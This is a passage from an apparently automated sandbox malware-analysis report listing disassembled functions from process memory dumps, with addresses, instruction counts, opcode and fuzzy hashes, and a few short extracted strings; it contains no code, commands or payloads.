                                      • Opcode Fuzzy Hash: 681ac945a8b7d5f5d612ee1aec1c76ced406da19b68eb68917d033ab7623fe85
                                      • Instruction Fuzzy Hash: 3901313095450EAEEBA8EB68C4592B977A0FF18345F60087ED41EC61D2DE39A550C641
                                      Function 00007FF886ED1140 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c4270f17b4f72fb9dbb129ad3ba8183a422f9a69f02bdd7a4ff9d5402ab49b2
                                      • Instruction ID: e37c3e3672d302c4953097e265c8819e0362ae79edc24a60c63d11b92c9b4eb6
                                      • Opcode Fuzzy Hash: 2c4270f17b4f72fb9dbb129ad3ba8183a422f9a69f02bdd7a4ff9d5402ab49b2
                                      • Instruction Fuzzy Hash: 76F0AF70D18A1E8AFB989BAC98583FA77E0FF66391F10067AD41AC61C2DE241958C641
                                      Function 00007FF886ED1C6D Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2680e9ceead2dd6da9956ebc38fbdcea20664178861da4a554842086d7e9697
                                      • Instruction ID: ac2eddc4b8ff406a66cb308c23fdc74372f9d81608dfca3c08be9bd9eb3c42f2
                                      • Opcode Fuzzy Hash: f2680e9ceead2dd6da9956ebc38fbdcea20664178861da4a554842086d7e9697
                                      • Instruction Fuzzy Hash: 7FF08C30909A4E8FEB99DF288859AFA77A0FF55345F60057AE819C6192CB39E850CB40
                                      Function 00007FF886ED05D0 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee1c9facee2ca88b6342a3bc7bc2027584646fd8ac8858cc634ca9f14832eb1b
                                      • Instruction ID: 5e57666e62cd18069597734d40642dcf2900f3be3e3a7b92e3163f2918a05a37
                                      • Opcode Fuzzy Hash: ee1c9facee2ca88b6342a3bc7bc2027584646fd8ac8858cc634ca9f14832eb1b
                                      • Instruction Fuzzy Hash: ABF0F03091960E8FEB99EF2894452FA37A0FF15344F60053AE80DC7182CB39E8A0CB81
                                      Function 00007FF886ED2729 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9ea8180432437446478f9baa514fd6347778686a6304b6c3dd51d474ca2729f
                                      • Instruction ID: 7546c906aad585d8a0dd0a21b8e2f18813a0a0b07e88956874a77f18f9b87990
                                      • Opcode Fuzzy Hash: c9ea8180432437446478f9baa514fd6347778686a6304b6c3dd51d474ca2729f
                                      • Instruction Fuzzy Hash: ABF0C83180D3899FDB659F2484252A93B60FF05340F5504BED449C60D3DA3C9854C741
                                      Function 00007FF886ED279D Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5c9a1f98ac24e19ba2e3ae15f3eeaba662ed23d5093254c6ab9e1cd6f403daeb
                                      • Instruction ID: 40327963e551d2ddae569dbefb565386d5602c8fadc95ba7007732e15d1d72e1
                                      • Opcode Fuzzy Hash: 5c9a1f98ac24e19ba2e3ae15f3eeaba662ed23d5093254c6ab9e1cd6f403daeb
                                      • Instruction Fuzzy Hash: 0BF0243081E78A8FEB689F28842A2B93BA0FF05314F0404BEE509C60D3DB3D9850C301
                                      Function 00007FF886ED23CE Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34f51b4e931255b8e8f405a01ab11ad91d7b836dd6515934a5e5c302054a0cca
                                      • Instruction ID: ac54cb65d350466c33ff5c37ed4e69759a8bca49b465f212bef2eeff336c4a6e
                                      • Opcode Fuzzy Hash: 34f51b4e931255b8e8f405a01ab11ad91d7b836dd6515934a5e5c302054a0cca
                                      • Instruction Fuzzy Hash: 60F0153090851ACEEB64EF14C849BED73A0FB50341F2005BAC00ED22A2CE782E84CB40

                                      Executed Functions

                                      Function 00007FF886ED3545 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: W_H
                                      • API String ID: 0-126398842
                                      • Opcode ID: 7d50396998f15c497d64b4fa6dbc5cc246e491fe4242e0d7c294fcb1680651b7
                                      • Instruction ID: e53ab2241ea102b47e8eda14a0defa74b034fdf7556a404a5d5f28defa36114d
                                      • Opcode Fuzzy Hash: 7d50396998f15c497d64b4fa6dbc5cc246e491fe4242e0d7c294fcb1680651b7
                                      • Instruction Fuzzy Hash: 5F919F71E289498FEB94DB6CD8553EDBBE1FBAA390F94017AC00DD73C6DA685801CB41
                                      Function 00007FF886EE1EAA Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee1000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$/
                                      • API String ID: 0-2662438755
                                      • Opcode ID: 7ab98dcd965f81af6552ca5095cf60cc9644a393dd5c1f218d52427529cd573b
                                      • Instruction ID: e37e631823473af02b310f09e91bd946186b9963502cbccaaf70b5af6af2abba
                                      • Opcode Fuzzy Hash: 7ab98dcd965f81af6552ca5095cf60cc9644a393dd5c1f218d52427529cd573b
                                      • Instruction Fuzzy Hash: 9821C774D0462D8BDBA8CF94C8647EDB3B2BF95341F1482AAD00AAB2D4DB745E84CF51
                                      Function 00007FF886ED03BD Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: sQ^
                                      • API String ID: 0-1726393085
                                      • Opcode ID: 4055c60bcac59b6047ec321c244ebad10ca9691ebe4e871242164bffa1f86b72
                                      • Instruction ID: 4c27f76f5e4c7656c65ed5eca80e75f008db9a1577e29b432a89a914f9aaff8d
                                      • Opcode Fuzzy Hash: 4055c60bcac59b6047ec321c244ebad10ca9691ebe4e871242164bffa1f86b72
                                      • Instruction Fuzzy Hash: 6B51D752D0D6D25BE215AA7CAC565E97F50FF623A4B1C41FBC08C8A093DD09AC4AC396
                                      Function 00007FF886EDCEF3 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: uL_^
                                      • API String ID: 0-3050686078
                                      • Opcode ID: f448fbc43cb18fc8c21c71206304274f46b7181dc84e4010ea1e5ffa728f06f6
                                      • Instruction ID: 5a245534064e62d9712a299c8b1951c60cb370a5b25248aac44f963da7f39d78
                                      • Opcode Fuzzy Hash: f448fbc43cb18fc8c21c71206304274f46b7181dc84e4010ea1e5ffa728f06f6
                                      • Instruction Fuzzy Hash: 5031C122E1C6574BEB027BACA8092FC3BD4BF617E4F244177D00CCA083DE386841D292
                                      Function 00007FF886EE599B Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: H|{
                                      • API String ID: 0-2800150826
                                      • Opcode ID: 470cf0be37567cf04d393d21be98d453cbf6a115aab5859a951be1b3ac4b5db0
                                      • Instruction ID: a363b9e798b11bc3a1235b8c4b759fe038ff69546075d2a4b362417af07b8cb7
                                      • Opcode Fuzzy Hash: 470cf0be37567cf04d393d21be98d453cbf6a115aab5859a951be1b3ac4b5db0
                                      • Instruction Fuzzy Hash: 52D0C971C19B4A8FE694EA1C844E3A9BBF1FF54340B54002AD40892146DF315842DB01
                                      Function 00007FF886ED0515 Relevance: .4, Instructions: 386COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a8403f99686eb58f8fac536645bfc74f56f8240e4daae853bedb5f164d897370
                                      • Instruction ID: 7f4506bef18bb54e62d2691e57855430c2139097c904802bcd6202e370e609a3
                                      • Opcode Fuzzy Hash: a8403f99686eb58f8fac536645bfc74f56f8240e4daae853bedb5f164d897370
                                      • Instruction Fuzzy Hash: 0CB12403E0E5DA4AE2117AACBC591F97F90FF523A4B1C82B7D08C8A1D7DD1C98468296
                                      Function 00007FF886ED05A0 Relevance: .3, Instructions: 314COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7384c5cd3f97542189bddf72baacdd8d02fa5cc118558129dac69d4777b53d57
                                      • Instruction ID: d70c9ce7277920d2eb50f56636b0a0f560c1ad22c4f72d6b364868e5caf15d1d
                                      • Opcode Fuzzy Hash: 7384c5cd3f97542189bddf72baacdd8d02fa5cc118558129dac69d4777b53d57
                                      • Instruction Fuzzy Hash: A5910402E1E5D64EE2116ABCBC591F97F90FF523A4B1C82F7D0888F1D7DD1C98468296
                                      Function 00007FF886ED05ED Relevance: .3, Instructions: 304COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 95a37b0c57dc9815c45c68ddfe6ba65be022023f423767aa62d8647c8550bed0
                                      • Instruction ID: b579b044a4094c5d83edb1da7a14f96299fdc843d895ed6b33545cd359ac0c45
                                      • Opcode Fuzzy Hash: 95a37b0c57dc9815c45c68ddfe6ba65be022023f423767aa62d8647c8550bed0
                                      • Instruction Fuzzy Hash: B2912302E0E6D64FE2116ABCAC191F97F90FF523A0B1C82F7D0888B1D7DD189846C292
                                      Function 00007FF886ED16B8 Relevance: .3, Instructions: 285COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8779a2164d3fd2d56926c594a4d56de099f4220e842663fb0cff5a68a003723f
                                      • Instruction ID: 754ceb38c10c803716b7878dcf88876e2e5eedaeb93557542587b1cb0881c684
                                      • Opcode Fuzzy Hash: 8779a2164d3fd2d56926c594a4d56de099f4220e842663fb0cff5a68a003723f
                                      • Instruction Fuzzy Hash: 8B819D31A1CA498BDB58DE5C98556B977E2FFD9741F24427EE44EC3282CE34AC02C781
                                      Function 00007FF886ED0640 Relevance: .3, Instructions: 265COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 010ea11bf09f877a3fb2b2ec35c25868228275b9be94e423d8b6a3ad29ad874e
                                      • Instruction ID: b26185641c65eb062a09b5418ae3106f6bf4d30c652b5b7c2973c3e63189bf71
                                      • Opcode Fuzzy Hash: 010ea11bf09f877a3fb2b2ec35c25868228275b9be94e423d8b6a3ad29ad874e
                                      • Instruction Fuzzy Hash: 1C711512E1E6D64EE2116ABCBC191F96F90FF523A0B1C92F7D0898F1DBDC1C9846C295
                                      Function 00007FF886ED05B0 Relevance: .2, Instructions: 242COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 516f4a8d42984600c4d759998f78897db977915a4381b981822008bb920383ff
                                      • Instruction ID: 10192cb2bd3bc4ac7e285bb78e9af6d120fb7d20ba36b26f7d5274d3f591839d
                                      • Opcode Fuzzy Hash: 516f4a8d42984600c4d759998f78897db977915a4381b981822008bb920383ff
                                      • Instruction Fuzzy Hash: 0C711512E1E6964FE3116ABCAC591E97F90FF523A0F1C82B7C0888B0D7DD18A846C391
                                      Function 00007FF886ED1CED Relevance: .2, Instructions: 187COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a8638bfc53a9fdabe3a3c5c175878ca1f564305af06a14e9bf370d4aa8906acf
                                      • Instruction ID: dfee55b4b1489653bc410526bf387b73aa053724ed57fbf7a4188717cc8096b4
                                      • Opcode Fuzzy Hash: a8638bfc53a9fdabe3a3c5c175878ca1f564305af06a14e9bf370d4aa8906acf
                                      • Instruction Fuzzy Hash: 9E51B031A18A498FDB58DE1C88556BA77E2FFD8351B24427ED45EC7282CE34EC02CB81
                                      Function 00007FF886EE4000 Relevance: .2, Instructions: 166COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e4f3a062d372f5f5466757ad8a8a2f33478fe46259c305749c1ba9746256a7d4
                                      • Instruction ID: 52edae46d560bf7d3475de75b250ab290dfa954e6557016614f2066d8c957f1d
                                      • Opcode Fuzzy Hash: e4f3a062d372f5f5466757ad8a8a2f33478fe46259c305749c1ba9746256a7d4
                                      • Instruction Fuzzy Hash: B5413827B0C1568BD300BBACF8595EF7BA0EF913B1F140477D548CA053DA28A45EC7A2
                                      Function 00007FF886ED31A5 Relevance: .1, Instructions: 145COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc61e2184e65654c3ce17869dfb31457acc55c9fecb5adbce474fb93fff872dd
                                      • Instruction ID: 37e89eadd351207f0f82108936681918d0e220ff4d619a35e9e6d0c8466a3828
                                      • Opcode Fuzzy Hash: fc61e2184e65654c3ce17869dfb31457acc55c9fecb5adbce474fb93fff872dd
                                      • Instruction Fuzzy Hash: 74514A70D0861E8FEB54DBA8C4996FDBBF1FF5A354F60017AD009E7292DA38A844CB40
                                      Function 00007FF886EE2D4D Relevance: .1, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee1000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9babc2ec276ea99f840932d31a35fe2d91de76a0445ebb2dc4fd0a9ad3136786
                                      • Instruction ID: 9c9c6a0b1da229981b4147eaaded63e558678d90307f244a4ae88f4a74bd6c30
                                      • Opcode Fuzzy Hash: 9babc2ec276ea99f840932d31a35fe2d91de76a0445ebb2dc4fd0a9ad3136786
                                      • Instruction Fuzzy Hash: FD411B70E2895D8FEB84EF98D8566EDB7B1FF58300F500179E009E7296CE386841CB51
                                      Function 00007FF886EDB6FD Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c695a30c11da59d35c057e23ec5834f92526034d012500771094cddea4084168
                                      • Instruction ID: 9560dc91cbf21c16b5500b896d384583b392a09d7e8c02c643102e2bda1a3381
                                      • Opcode Fuzzy Hash: c695a30c11da59d35c057e23ec5834f92526034d012500771094cddea4084168
                                      • Instruction Fuzzy Hash: 36414EB0D0855A9FEB54DB68C8457ED77F2FF58340F6482B6C009E7296EA38A985CF40
                                      Function 00007FF886EDC798 Relevance: .1, Instructions: 111COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e3c0af342b46f75a2ed07c718ab0627fdf7f490f0d650e9cca241a22c3741ba0
                                      • Instruction ID: dade327b3e963d94e08478954737200fae252571add7895c77c8bd70ab94fe70
                                      • Opcode Fuzzy Hash: e3c0af342b46f75a2ed07c718ab0627fdf7f490f0d650e9cca241a22c3741ba0
                                      • Instruction Fuzzy Hash: 4C31A675D1891D9FEB98EB5CD855AACB7B6FF58780F601139D00DE3282EE246C42DB40
                                      Function 00007FF886EDFA40 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EDF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EDF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886edf000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9600a7efd378e52e4389a4ee2ff8b36df8b2d4d03045f1c04df96ba24aa85b97
                                      • Instruction ID: 3c7b8736182be66b367eeba328a748fdc2540db82619887f946e49b22a3fdb77
                                      • Opcode Fuzzy Hash: 9600a7efd378e52e4389a4ee2ff8b36df8b2d4d03045f1c04df96ba24aa85b97
                                      • Instruction Fuzzy Hash: 05412B70E189198FDBA8DB189C957A9B7B1FF59341F5042E9D40DE3282DE346D81CF41
                                      Function 00007FF886EDC810 Relevance: .1, Instructions: 96COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de9441f5db1d9f8e64ad8daa28a1f7aff21489b9fdeed48a162e46e5369e5975
                                      • Instruction ID: 746c4e43e74488407b498c684c04a6d0c81dae504eba1461bec36e9358020cf4
                                      • Opcode Fuzzy Hash: de9441f5db1d9f8e64ad8daa28a1f7aff21489b9fdeed48a162e46e5369e5975
                                      • Instruction Fuzzy Hash: 8921B974E1C91D8FEB94EB9CD855AACB7B6FF59380F60112AD00DE3282DE246C42CB40
                                      Function 00007FF886ED0805 Relevance: .1, Instructions: 86COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfd5cd1aea6070b054d69d904996708cbf448b2e7e31a8c3e37143a6a0f6ec3c
                                      • Instruction ID: deff5011f06e1c3b02d7dfa5e577dac132186bd3a8fbb5712d0433d49e0f9479
                                      • Opcode Fuzzy Hash: cfd5cd1aea6070b054d69d904996708cbf448b2e7e31a8c3e37143a6a0f6ec3c
                                      • Instruction Fuzzy Hash: E1212666E2D6869BE3016B7CDC1A2E97790FF113A4F0C4172D458CA083EE18A456C2C1
                                      Function 00007FF886ED3277 Relevance: .1, Instructions: 79COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fd061e83e2b460bd08b71f3f0419774cec9e141e8e07e74e60998e2b01277c3
                                      • Instruction ID: 754a480e905e556decebd030b734b1b6f866d5380832554bbc086ebdaa4297b5
                                      • Opcode Fuzzy Hash: 0fd061e83e2b460bd08b71f3f0419774cec9e141e8e07e74e60998e2b01277c3
                                      • Instruction Fuzzy Hash: 7721F475D0851D8FEB88DBA8C4956FCBBF1FF59341F60403AD009E7296CA386840DB50
                                      Function 00007FF886ED2189 Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: adcb22f99009b13f7775a24f934f350f7f0db8c45eb5f9c387ef14bd705be7ac
                                      • Instruction ID: 1624e8e4db3e679000a6b1e483887229b03950d4254d86b25f3879be9e0b78fd
                                      • Opcode Fuzzy Hash: adcb22f99009b13f7775a24f934f350f7f0db8c45eb5f9c387ef14bd705be7ac
                                      • Instruction Fuzzy Hash: 7411933092CA4A4FE745E778844A2B977E0FF46384F5144B6D41DC7493DE2CA889C752
                                      Function 00007FF886EE73E5 Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04d0ec121bb634144f10e61d29e7801c1bcb501b9a2d8725b700082c2ab94f4a
                                      • Instruction ID: 7251f1528abbd2cd6b58ba004a73371cc1e489bbe6d2dca7d4717ccd83f7b66b
                                      • Opcode Fuzzy Hash: 04d0ec121bb634144f10e61d29e7801c1bcb501b9a2d8725b700082c2ab94f4a
                                      • Instruction Fuzzy Hash: A7219D30D08A4E9FEF99EF68C4992B97BA0FF28350F2405BED41DC7192DA35A885C751
                                      Function 00007FF886EE2CB0 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee1000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5971312ebf0eca3cf3af21169ba98c3016ab397582ed72eb1f5818a8a9064eba
                                      • Instruction ID: 0528fb8b888ffa658a75992320c65fdeb0294d59f440413b9277b8f339350c0c
                                      • Opcode Fuzzy Hash: 5971312ebf0eca3cf3af21169ba98c3016ab397582ed72eb1f5818a8a9064eba
                                      • Instruction Fuzzy Hash: 3311903484D7894FEB069B30886A2A57FB0FF16204F2604FBD449CB4D3DA2D5959C722
                                      Function 00007FF886ED339F Relevance: .1, Instructions: 69COMMON
